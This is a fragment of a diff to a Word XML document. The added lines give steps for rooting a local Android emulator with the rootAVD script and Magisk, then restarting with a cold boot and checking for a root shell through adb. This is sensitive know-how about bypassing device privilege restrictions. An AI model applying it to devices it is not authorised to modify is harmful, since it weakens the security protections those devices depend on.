+        <w:t xml:space="preserve"> (or </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ramdisk-qemu.img</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> for some images).</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>4. Root the running AVD:</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> - Keep the emulator running.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> - Run the command for your specific image (example for API 33/34 x86_64):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>rootAVD.bat system-images/android-33/google_apis_playstore/x86_64/ramdisk.img</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The script will:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">- Download/install a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Magisk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> version (you can choose Stable/Canary/Alpha).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">- Patch the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ramdisk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Optionally install apps from the Apps/ folder.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Create backups of original files.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>5. Restart the emulator:</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> - Close the emulator completely.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> - In Android Studio Device Manager, select Cold Boot (important for the patches to take effect).</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>6. Verify root:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve"> - Open </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Magisk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> app in the emulator (it should be pre-installed).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> - Run </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> shell and type </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>su</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> — you should get root shell (# prompt). </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -25466,6 +25669,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
